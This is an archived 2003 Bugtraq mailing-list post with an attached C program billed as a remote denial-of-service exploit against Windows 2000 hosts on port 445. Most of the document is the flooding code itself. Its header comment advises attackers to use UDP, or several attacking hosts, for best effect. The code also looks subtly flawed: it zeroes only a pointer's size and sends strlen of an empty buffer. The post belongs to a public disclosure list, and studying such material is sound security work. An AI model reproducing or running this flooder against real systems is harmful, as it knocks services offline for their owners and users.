[28502] in bugtraq
Microsoft-ds xploit (UDP/TCP)...
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Daniel_Nystr=F6m?=)
Tue Jan 21 00:24:35 2003
Message-ID: <003c01c2badb$4df6a890$0200a8c0@exce>
From: =?iso-8859-1?Q?Daniel_Nystr=F6m?= <exce@netwinder.nu>
To: <bugtraq@securityfocus.com>
Date: Mon, 13 Jan 2003 09:10:58 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_003A_01C2BAE3.AF8A1580"
------=_NextPart_000_003A_01C2BAE3.AF8A1580
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Hello :)=20
This is an DoS exploit that utilizes the flaw found=20
by KPMG Denmark, to crasch or hang any Win2k box=20
running the LanMan server on port 445 (ms-ds). =20
What it does is just a simple 10k NULL string=20
bombardment of port 445 TCP or UDP. =20
By: Daniel Nystrom <exce@netwinder.nu>=20
Download: http://www.telhack.tk
------=_NextPart_000_003A_01C2BAE3.AF8A1580
Content-Type: application/octet-stream;
name="ms-ds-xploit.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="ms-ds-xploit.c"
/********************************************************
* Microsoft Windows 2000 Remote DoS *
* --------------------------------- *
* *
* Hello :) *
* This is an DoS exploit that utilizes the flaw found *
* by KPMG Denmark, to crasch or hang any Win2k box *
* running the LanMan server on port 445 (ms-ds). *
* What it does is just a simple 10k NULL string *
* bombardment of port 445 TCP or UDP. *
* *
* *
* By: Daniel Nystrom <exce@netwinder.nu> *
* Download: www.telhack.tk / exce.darktech.org *
* *
* Suggestions: When performing the attack, use UDP if *
* you are attacking from a single host. *
* TCP only eats about 35% CPU on an AMD *
* Athlon XP 1800+ while UDP eats 99%. *
* So if TCP is the only option, use more *
* than one attacking host. All in all this *
* DoS is "pretty weak" and should be used *
* from more than one host in each attack *
* to get the best result. *
* *
* Compiles on: Linux (Debian 2.2r6 and RH 7.3 tested). *
* Should compile on other *nix's as well. *
* *
* Thanks: Peter Grundl, for answering my Q's :) *
* *
* greets: xenogen, ifa-, zeromatic, RTJ, all@telhack *
* *
********************************************************/
#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>
#define MICROSOFT_DS_PORT 445
unsigned long resolveTarget(char nstarget[]);
int main(int argc, char *argv[])
{
int sock;
int count;
struct sockaddr_in target;
unsigned short port =3D MICROSOFT_DS_PORT;
char *nullbuffer;
printf("%c[41m", 0x1B);
fprintf(stdout, "\n--[ excE's Remote Microsoft Windows 2000 DoS =
(microsoft-ds)\n");=20
printf("%c[0m", 0x1B);
fprintf(stdout, =
"-----------------------------------------------------------\n");
if(argc !=3D 4)
{
fprintf(stderr, "--[ Invalid number of parameters!\n");
fprintf(stderr, "--[ Usage: %s <Server IP> <TCP/UDP> =
<Send Count>\n", argv[0]);
fprintf(stderr, "--[ Forex: %s 127.0.0.1 UDP 10000\n\n", =
argv[0]);
exit(-1);
}
nullbuffer =3D (char *) malloc(10*1024*sizeof(char));
bzero(nullbuffer,sizeof(nullbuffer));
=09
fprintf(stdout, "--[ Starting attack on %s...\n", argv[1]);
memset(&target, 0, sizeof(target));
target.sin_family =3D AF_INET;
target.sin_addr.s_addr =3D resolveTarget(argv[1]);
target.sin_port =3D htons(port);
if(argv[2][0] =3D=3D 'U')
{
if((sock =3D socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
{
perror("socket() failed ");
exit(-1);
}
=09
fprintf(stdout, "--[ Sending NULL byte string * %d via UDP\n", =
atoi(argv[3]));
for(count=3D0;count<atoi(argv[3]);count++)
{
if(sendto(sock, nullbuffer, strlen(nullbuffer), 0, (struct =
sockaddr *) &target, sizeof(target)) !=3D strlen(nullbuffer))
{
perror("sendto() failed ");
exit(-1);
} else { printf("."); }=20
}
close(sock);
printf("\n");
}
else if(argv[2][0] =3D=3D 'T')
{
=09
fprintf(stdout, "--[ Connecting and sending NULL byte string * =
%d...\n", atoi(argv[3]));
=20
if((sock =3D socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror("socket() failed ");
exit(-1);
}
if(connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0)
{
perror("connect() failed ");
exit(-1);
}
for(count=3D0;count<atoi(argv[3]);count++)
{=20
if(send(sock, nullbuffer, strlen(nullbuffer), 0) !=3D =
strlen(nullbuffer))
{
perror("send() failed ");
exit(-1);
} else { printf("."); }
}
close(sock);
printf("\n");
} else
{
fprintf(stderr, "--[ Error: You must define a protocol (TCP or =
UDP)\n\n");
exit(-1);
}
fprintf(stdout, "--[ Finished flooding target!\n");
fprintf(stdout, "--[ http://www.telhack.tk\n");
=09
return 0;
}
unsigned long resolveTarget(char nstarget[])
{
struct hostent *targetname;
if((targetname=3Dgethostbyname(nstarget)) =3D=3D NULL)
{
fprintf(stderr, "--[ Name lookup failed. Please enter a valid IP or =
hostname\n");
exit(-1);
}
return *((unsigned long *) targetname->h_addr_list[0]);
}
------=_NextPart_000_003A_01C2BAE3.AF8A1580--
